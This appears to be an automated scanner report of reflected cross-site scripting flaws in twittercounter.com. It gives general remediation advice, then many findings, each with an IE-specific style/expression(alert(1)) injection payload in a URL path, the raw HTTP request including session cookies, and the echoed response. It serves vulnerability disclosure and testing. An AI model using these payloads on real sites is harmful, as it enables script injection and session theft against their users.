Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c401e"style%3d"x%3aexpression(alert(1))"3edb2367a41 was submitted in the username parameter. This input was echoed as c401e"style="x:expression(alert(1))"3edb2367a41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a8b5"style%3d"x%3aexpression(alert(1))"3d8f2ecdac6 was submitted in the REST URL parameter 1. This input was echoed as 6a8b5"style="x:expression(alert(1))"3d8f2ecdac6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /08539324366a8b5"style%3d"x%3aexpression(alert(1))"3d8f2ecdac6/test HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:19 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/08539324366a8b5"style="x:expression(alert(1))"3d8f2ecdac6/test" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46318"style%3d"x%3aexpression(alert(1))"a2c2c8389f5 was submitted in the REST URL parameter 2. This input was echoed as 46318"style="x:expression(alert(1))"a2c2c8389f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /0853932436/test46318"style%3d"x%3aexpression(alert(1))"a2c2c8389f5 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:27 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13252
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/0853932436/test46318"style="x:expression(alert(1))"a2c2c8389f5" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfd8b"style%3d"x%3aexpression(alert(1))"1588294b684 was submitted in the REST URL parameter 1. This input was echoed as dfd8b"style="x:expression(alert(1))"1588294b684 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /2135076986dfd8b"style%3d"x%3aexpression(alert(1))"1588294b684/test HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:47 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/2135076986dfd8b"style="x:expression(alert(1))"1588294b684/test" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebbc4"style%3d"x%3aexpression(alert(1))"afbe209645b was submitted in the REST URL parameter 2. This input was echoed as ebbc4"style="x:expression(alert(1))"afbe209645b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /2135076986/testebbc4"style%3d"x%3aexpression(alert(1))"afbe209645b HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:52 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13242
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/2135076986/testebbc4"style="x:expression(alert(1))"afbe209645b" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1625"style%3d"x%3aexpression(alert(1))"29f181aa5dc was submitted in the REST URL parameter 1. This input was echoed as d1625"style="x:expression(alert(1))"29f181aa5dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /3064891530d1625"style%3d"x%3aexpression(alert(1))"29f181aa5dc/test HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:18 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23726
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/3064891530d1625"style="x:expression(alert(1))"29f181aa5dc/test" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87a58"style%3d"x%3aexpression(alert(1))"2076562554f was submitted in the REST URL parameter 2. This input was echoed as 87a58"style="x:expression(alert(1))"2076562554f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /3064891530/test87a58"style%3d"x%3aexpression(alert(1))"2076562554f HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:20 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/3064891530/test87a58"style="x:expression(alert(1))"2076562554f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e104"style%3d"x%3aexpression(alert(1))"5126353b5ab was submitted in the REST URL parameter 1. This input was echoed as 4e104"style="x:expression(alert(1))"5126353b5ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /50cent4e104"style%3d"x%3aexpression(alert(1))"5126353b5ab HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:26 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23701
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/50cent4e104"style="x:expression(alert(1))"5126353b5ab" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbaaf"style%3d"x%3aexpression(alert(1))"00d7a275f33 was submitted in the REST URL parameter 1. This input was echoed as dbaaf"style="x:expression(alert(1))"00d7a275f33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cc91"style%3d"x%3aexpression(alert(1))"859532cbb9d was submitted in the REST URL parameter 1. This input was echoed as 1cc91"style="x:expression(alert(1))"859532cbb9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ABTD1cc91"style%3d"x%3aexpression(alert(1))"859532cbb9d/ HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:31 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/ABTD1cc91"style="x:expression(alert(1))"859532cbb9d/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44c76"style%3d"x%3aexpression(alert(1))"8ec4e3981fe was submitted in the REST URL parameter 1. This input was echoed as 44c76"style="x:expression(alert(1))"8ec4e3981fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Andiamo201044c76"style%3d"x%3aexpression(alert(1))"8ec4e3981fe HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:22 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23705
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/Andiamo201044c76"style="x:expression(alert(1))"8ec4e3981fe" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a13"style%3d"x%3aexpression(alert(1))"24aae756f68 was submitted in the REST URL parameter 1. This input was echoed as a8a13"style="x:expression(alert(1))"24aae756f68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ArianaGrandea8a13"style%3d"x%3aexpression(alert(1))"24aae756f68 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:55 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/ArianaGrandea8a13"style="x:expression(alert(1))"24aae756f68" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5421"style%3d"x%3aexpression(alert(1))"7532da44463 was submitted in the REST URL parameter 1. This input was echoed as c5421"style="x:expression(alert(1))"7532da44463 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /BabySleepClinicc5421"style%3d"x%3aexpression(alert(1))"7532da44463 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:37 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/BabySleepClinicc5421"style="x:expression(alert(1))"7532da44463" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7572"style%3d"x%3aexpression(alert(1))"f1f66d15a6 was submitted in the REST URL parameter 1. This input was echoed as e7572"style="x:expression(alert(1))"f1f66d15a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /BarackObamae7572"style%3d"x%3aexpression(alert(1))"f1f66d15a6 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:27 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/BarackObamae7572"style="x:expression(alert(1))"f1f66d15a6" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f3b5"style%3d"x%3aexpression(alert(1))"496d9539173 was submitted in the REST URL parameter 1. This input was echoed as 5f3b5"style="x:expression(alert(1))"496d9539173 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /DavidCaplanNYC5f3b5"style%3d"x%3aexpression(alert(1))"496d9539173 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:01 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23677
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/DavidCaplanNYC5f3b5"style="x:expression(alert(1))"496d9539173" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73c18"style%3d"x%3aexpression(alert(1))"87a3f62e306 was submitted in the REST URL parameter 1. This input was echoed as 73c18"style="x:expression(alert(1))"87a3f62e306 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /DiscoveryBayEnt73c18"style%3d"x%3aexpression(alert(1))"87a3f62e306 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:46 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/DiscoveryBayEnt73c18"style="x:expression(alert(1))"87a3f62e306" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c270"style%3d"x%3aexpression(alert(1))"67331970aea was submitted in the REST URL parameter 1. This input was echoed as 8c270"style="x:expression(alert(1))"67331970aea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /DiscoveryBayEnt8c270"style%3d"x%3aexpression(alert(1))"67331970aea/ HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:25 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23693
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/DiscoveryBayEnt8c270"style="x:expression(alert(1))"67331970aea/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71577"style%3d"x%3aexpression(alert(1))"03baa161a60 was submitted in the REST URL parameter 1. This input was echoed as 71577"style="x:expression(alert(1))"03baa161a60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /LakePalin71577"style%3d"x%3aexpression(alert(1))"03baa161a60 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:19 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23807
